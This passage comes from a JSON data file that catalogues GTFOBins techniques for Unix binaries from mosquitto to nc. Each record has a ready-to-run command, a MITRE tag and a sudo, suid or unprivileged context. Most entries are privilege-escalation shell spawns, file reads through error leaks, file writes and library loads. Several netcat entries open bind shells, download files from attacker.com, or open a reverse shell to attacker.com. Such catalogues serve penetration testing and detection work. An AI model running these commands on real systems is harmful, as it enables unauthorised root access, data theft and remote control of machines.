message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mosquitto/"]},{"id":"gtfo:mount:privilege-escalation:0:sudo","toolId":"gtfo:mount","toolName":"mount","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"mount -o bind /bin/sh /bin/mount\nmount","description":"This overrides `mount` itself with a shell (or any other executable).","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mount/"]},{"id":"gtfo:msfconsole:inherit:0:sudo","toolId":"gtfo:msfconsole","toolName":"msfconsole","name":"inherit ← irb","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["inherit"],"command":"msfconsole\nirb","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/msfconsole/"]},{"id":"gtfo:msfconsole:inherit:0:unprivileged","toolId":"gtfo:msfconsole","toolName":"msfconsole","name":"inherit ← irb","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["inherit"],"command":"msfconsole\nirb","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/msfconsole/"]},{"id":"gtfo:msgattrib:file-read:0:sudo","toolId":"gtfo:msgattrib","toolName":"msgattrib","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgattrib -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/msgattrib/"]},{"id":"gtfo:msgattrib:file-read:0:suid","toolId":"gtfo:msgattrib","toolName":"msgattrib","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgattrib -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/msgattrib/"]},{"id":"gtfo:msgattrib:file-read:0:unprivileged","toolId":"gtfo:msgattrib","toolName":"msgattrib","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"msgattrib -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/msgattrib/"]},{"id":"gtfo:msgcat:file-read:0:sudo","toolId":"gtfo:msgcat","toolName":"msgcat","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgcat -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/msgcat/"]},{"id":"gtfo:msgcat:file-read:0:suid","toolId":"gtfo:msgcat","toolName":"msgcat","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgcat -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/msgcat/"]},{"id":"gtfo:msgcat:file-read:0:unprivileged","toolId":"gtfo:msgcat","toolName":"msgcat","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"msgcat -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/msgcat/"]},{"id":"gtfo:msgconv:file-read:0:sudo","toolId":"gtfo:msgconv","toolName":"msgconv","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgconv -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/msgconv/"]},{"id":"gtfo:msgconv:file-read:0:suid","toolId":"gtfo:msgconv","toolName":"msgconv","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgconv -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/msgconv/"]},{"id":"gtfo:msgconv:file-read:0:unprivileged","toolId":"gtfo:msgconv","toolName":"msgconv","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"msgconv -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/msgconv/"]},{"id":"gtfo:msgfilter:file-read:0:sudo","toolId":"gtfo:msgfilter","toolName":"msgfilter","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgfilter -P -i /path/to/input-file /bin/cat","description":"The file is parsed and displayed as a Java `.properties` file. `/bin/cat` can be replaced with any other *filter* program.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/msgfilter/"]},{"id":"gtfo:msgfilter:file-read:0:suid","toolId":"gtfo:msgfilter","toolName":"msgfilter","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgfilter -P -i /path/to/input-file /bin/cat","description":"The file is parsed and displayed as a Java `.properties` file. `/bin/cat` can be replaced with any other *filter* program.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/msgfilter/"]},{"id":"gtfo:msgfilter:file-read:0:unprivileged","toolId":"gtfo:msgfilter","toolName":"msgfilter","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"msgfilter -P -i /path/to/input-file /bin/cat","description":"The file is parsed and displayed as a Java `.properties` file. `/bin/cat` can be replaced with any other *filter* program.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/msgfilter/"]},{"id":"gtfo:msgfilter:shell:0:sudo","toolId":"gtfo:msgfilter","toolName":"msgfilter","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo x | msgfilter -P /bin/sh -c '/bin/sh 0<&2 1>&2; kill $PPID'","description":"The `kill` command is needed to spawn the shell only once. Instead of readinf from standard input, it can read files passed via the `-i` option.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/msgfilter/"]},{"id":"gtfo:msgfilter:shell:0:suid","toolId":"gtfo:msgfilter","toolName":"msgfilter","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo x | msgfilter -P /bin/sh -p -c '/bin/sh -p 0<&2 1>&2; kill $PPID'","description":"The `kill` command is needed to spawn the shell only once. Instead of readinf from standard input, it can read files passed via the `-i` option.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/msgfilter/"]},{"id":"gtfo:msgfilter:shell:0:unprivileged","toolId":"gtfo:msgfilter","toolName":"msgfilter","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo x | msgfilter -P /bin/sh -c '/bin/sh 0<&2 1>&2; kill $PPID'","description":"The `kill` command is needed to spawn the shell only once. Instead of readinf from standard input, it can read files passed via the `-i` option.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/msgfilter/"]},{"id":"gtfo:msgmerge:file-read:0:sudo","toolId":"gtfo:msgmerge","toolName":"msgmerge","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgmerge -P /path/to/input-file /dev/null","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/msgmerge/"]},{"id":"gtfo:msgmerge:file-read:0:suid","toolId":"gtfo:msgmerge","toolName":"msgmerge","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgmerge -P /path/to/input-file /dev/null","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/msgmerge/"]},{"id":"gtfo:msgmerge:file-read:0:unprivileged","toolId":"gtfo:msgmerge","toolName":"msgmerge","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"msgmerge -P /path/to/input-file /dev/null","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/msgmerge/"]},{"id":"gtfo:msguniq:file-read:0:sudo","toolId":"gtfo:msguniq","toolName":"msguniq","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msguniq -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/msguniq/"]},{"id":"gtfo:msguniq:file-read:0:suid","toolId":"gtfo:msguniq","toolName":"msguniq","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msguniq -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/msguniq/"]},{"id":"gtfo:msguniq:file-read:0:unprivileged","toolId":"gtfo:msguniq","toolName":"msguniq","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"msguniq -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/msguniq/"]},{"id":"gtfo:mtr:file-read:0:sudo","toolId":"gtfo:mtr","toolName":"mtr","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"mtr --raw -F /path/to/input-file","description":"The file is actually parsed, thus the content is corrupted by error prints.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mtr/"]},{"id":"gtfo:mtr:file-read:0:unprivileged","toolId":"gtfo:mtr","toolName":"mtr","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"mtr --raw -F /path/to/input-file","description":"The file is actually parsed, thus the content is corrupted by error prints.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mtr/"]},{"id":"gtfo:multitime:shell:0:sudo","toolId":"gtfo:multitime","toolName":"multitime","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"multitime /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/multitime/"]},{"id":"gtfo:multitime:shell:0:suid","toolId":"gtfo:multitime","toolName":"multitime","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"multitime /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/multitime/"]},{"id":"gtfo:multitime:shell:0:unprivileged","toolId":"gtfo:multitime","toolName":"multitime","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"multitime /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/multitime/"]},{"id":"gtfo:mutt:file-read:0:sudo","toolId":"gtfo:mutt","toolName":"mutt","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"mutt -F /path/to/input-file","description":"The file is leaked as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mutt/"]},{"id":"gtfo:mutt:file-read:0:unprivileged","toolId":"gtfo:mutt","toolName":"mutt","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"mutt -F /path/to/input-file","description":"The file is leaked as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mutt/"]},{"id":"gtfo:mv:file-write:0:sudo","toolId":"gtfo:mv","toolName":"mv","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\nmv /path/to/temp-file /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mv/"]},{"id":"gtfo:mv:file-write:0:suid","toolId":"gtfo:mv","toolName":"mv","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\nmv /path/to/temp-file /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mv/"]},{"id":"gtfo:mv:file-write:0:unprivileged","toolId":"gtfo:mv","toolName":"mv","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\nmv /path/to/temp-file /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mv/"]},{"id":"gtfo:mv:privilege-escalation:0:sudo","toolId":"gtfo:mv","toolName":"mv","name":"privilege-escalation","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"mv /path/to/input-file /path/to/output-file","description":"This can be used to move and then read or write files from a restricted file systems or with elevated privileges.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mv/"]},{"id":"gtfo:mv:privilege-escalation:0:suid","toolId":"gtfo:mv","toolName":"mv","name":"privilege-escalation","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"mv /path/to/input-file /path/to/output-file","description":"This can be used to move and then read or write files from a restricted file systems or with elevated privileges.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mv/"]},{"id":"gtfo:mypy:file-read:0:sudo","toolId":"gtfo:mypy","toolName":"mypy","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"mypy /path/to/input-file","description":"Partial content is leaked as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mypy/"]},{"id":"gtfo:mypy:file-read:0:unprivileged","toolId":"gtfo:mypy","toolName":"mypy","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"mypy /path/to/input-file","description":"Partial content is leaked as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mypy/"]},{"id":"gtfo:mypy:file-write:0:sudo","toolId":"gtfo:mypy","toolName":"mypy","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"mypy /path/to/input-file --junit-xml /path/to/output-file","description":"Partial content is leaked as error messages inside some XML tags.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mypy/"]},{"id":"gtfo:mypy:file-write:0:unprivileged","toolId":"gtfo:mypy","toolName":"mypy","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"mypy /path/to/input-file --junit-xml /path/to/output-file","description":"Partial content is leaked as error messages inside some XML tags.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mypy/"]},{"id":"gtfo:mysql:library-load:0:sudo","toolId":"gtfo:mysql","toolName":"mysql","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"mysql --default-auth ../../../../../path/to/lib","description":"The following loads the `/path/to/lib.so` shared object.","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mysql/"]},{"id":"gtfo:mysql:library-load:0:suid","toolId":"gtfo:mysql","toolName":"mysql","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"mysql --default-auth ../../../../../path/to/lib","description":"The following loads the `/path/to/lib.so` shared object.","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mysql/"]},{"id":"gtfo:mysql:library-load:0:unprivileged","toolId":"gtfo:mysql","toolName":"mysql","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"mysql --default-auth ../../../../../path/to/lib","description":"The following loads the `/path/to/lib.so` shared object.","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mysql/"]},{"id":"gtfo:mysql:shell:0:sudo","toolId":"gtfo:mysql","toolName":"mysql","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mysql -e '\\! /bin/sh'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mysql/"]},{"id":"gtfo:mysql:shell:0:suid","toolId":"gtfo:mysql","toolName":"mysql","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mysql -e '\\! /bin/sh'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mysql/"]},{"id":"gtfo:mysql:shell:0:unprivileged","toolId":"gtfo:mysql","toolName":"mysql","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"mysql -e '\\! /bin/sh'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mysql/"]},{"id":"gtfo:nano:file-read:0:sudo","toolId":"gtfo:nano","toolName":"nano","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nano /path/to/input-file","description":"The file content is displayed in the terminal interface.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nano/"]},{"id":"gtfo:nano:file-read:0:suid","toolId":"gtfo:nano","toolName":"nano","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nano /path/to/input-file","description":"The file content is displayed in the terminal interface.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nano/"]},{"id":"gtfo:nano:file-read:0:unprivileged","toolId":"gtfo:nano","toolName":"nano","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"nano /path/to/input-file","description":"The file content is displayed in the terminal interface.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nano/"]},{"id":"gtfo:nano:file-write:0:sudo","toolId":"gtfo:nano","toolName":"nano","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"nano /path/to/output-file\nDATA\n^O","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nano/"]},{"id":"gtfo:nano:file-write:0:suid","toolId":"gtfo:nano","toolName":"nano","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"nano /path/to/output-file\nDATA\n^O","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nano/"]},{"id":"gtfo:nano:file-write:0:unprivileged","toolId":"gtfo:nano","toolName":"nano","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"nano /path/to/output-file\nDATA\n^O","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nano/"]},{"id":"gtfo:nano:shell:0:sudo","toolId":"gtfo:nano","toolName":"nano","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nano\n^R^X\nreset; sh 1>&0 2>&0","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nano/"]},{"id":"gtfo:nano:shell:0:suid","toolId":"gtfo:nano","toolName":"nano","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nano\n^R^X\nreset; sh 1>&0 2>&0","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nano/"]},{"id":"gtfo:nano:shell:0:unprivileged","toolId":"gtfo:nano","toolName":"nano","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"nano\n^R^X\nreset; sh 1>&0 2>&0","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nano/"]},{"id":"gtfo:nano:shell:1:sudo","toolId":"gtfo:nano","toolName":"nano","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nano -s /bin/sh\n/bin/sh\n^T^T","description":"The `SPELL` environment variable can be used in place of the `-s` option if the command line cannot be changed.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nano/"]},{"id":"gtfo:nano:shell:1:suid","toolId":"gtfo:nano","toolName":"nano","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nano -s '/bin/sh -p'\n/bin/sh -p\n^T^T","description":"The `SPELL` environment variable can be used in place of the `-s` option if the command line cannot be changed.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nano/"]},{"id":"gtfo:nano:shell:1:unprivileged","toolId":"gtfo:nano","toolName":"nano","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"nano -s /bin/sh\n/bin/sh\n^T^T","description":"The `SPELL` environment variable can be used in place of the `-s` option if the command line cannot be changed.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nano/"]},{"id":"gtfo:nasm:file-read:0:sudo","toolId":"gtfo:nasm","toolName":"nasm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nasm -@ /path/to/input-file","description":"The file content is treated as command line options and disclosed throught error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nasm/"]},{"id":"gtfo:nasm:file-read:0:suid","toolId":"gtfo:nasm","toolName":"nasm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nasm -@ /path/to/input-file","description":"The file content is treated as command line options and disclosed throught error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nasm/"]},{"id":"gtfo:nasm:file-read:0:unprivileged","toolId":"gtfo:nasm","toolName":"nasm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"nasm -@ /path/to/input-file","description":"The file content is treated as command line options and disclosed throught error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nasm/"]},{"id":"gtfo:nc:bind-shell:0:sudo","toolId":"gtfo:nc","toolName":"nc","name":"bind-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"nc -l -p 12345 -e /bin/sh","description":"This only works with netcat traditional.","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nc/"]},{"id":"gtfo:nc:bind-shell:0:suid","toolId":"gtfo:nc","toolName":"nc","name":"bind-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"nc -l -p 12345 -e /bin/sh","description":"This only works with netcat traditional.","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nc/"]},{"id":"gtfo:nc:bind-shell:0:unprivileged","toolId":"gtfo:nc","toolName":"nc","name":"bind-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["bind-shell"],"command":"nc -l -p 12345 -e /bin/sh","description":"This only works with netcat traditional.","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nc/"]},{"id":"gtfo:nc:download:0:sudo","toolId":"gtfo:nc","toolName":"nc","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"nc -l -p 12345 >/path/to/output-file","description":"The file is actually written by the invoking shell.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nc/"]},{"id":"gtfo:nc:download:0:suid","toolId":"gtfo:nc","toolName":"nc","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"nc -l -p 12345 >/path/to/output-file","description":"The file is actually written by the invoking shell.","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nc/"]},{"id":"gtfo:nc:download:0:unprivileged","toolId":"gtfo:nc","toolName":"nc","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"nc -l -p 12345 >/path/to/output-file","description":"The file is actually written by the invoking shell.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nc/"]},{"id":"gtfo:nc:download:1:sudo","toolId":"gtfo:nc","toolName":"nc","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"nc attacker.com 12345 >/path/to/output-file","description":"The file is actually written by the invoking shell.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nc/"]},{"id":"gtfo:nc:download:1:suid","toolId":"gtfo:nc","toolName":"nc","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"nc attacker.com 12345 >/path/to/output-file","description":"The file is actually written by the invoking shell.","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nc/"]},{"id":"gtfo:nc:download:1:unprivileged","toolId":"gtfo:nc","toolName":"nc","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"nc attacker.com 12345 >/path/to/output-file","description":"The file is actually written by the invoking shell.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nc/"]},{"id":"gtfo:nc:reverse-shell:0:sudo","toolId":"gtfo:nc","toolName":"nc","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"nc -e /bin/sh attacker.com 12345","description":"This only works with netcat traditional.","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nc/"]},{"id":"gtfo:nc:reverse-shell:0:suid","toolId":"gtfo:nc","toolName":"nc","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"nc -e /bin/sh attacker.com 12345","description":"This only works with netcat traditional.","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nc/"]},{"id":"gtfo:nc:reverse-shell:0:unprivileged","toolId":"gtfo:nc","toolName":"nc","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"nc -e 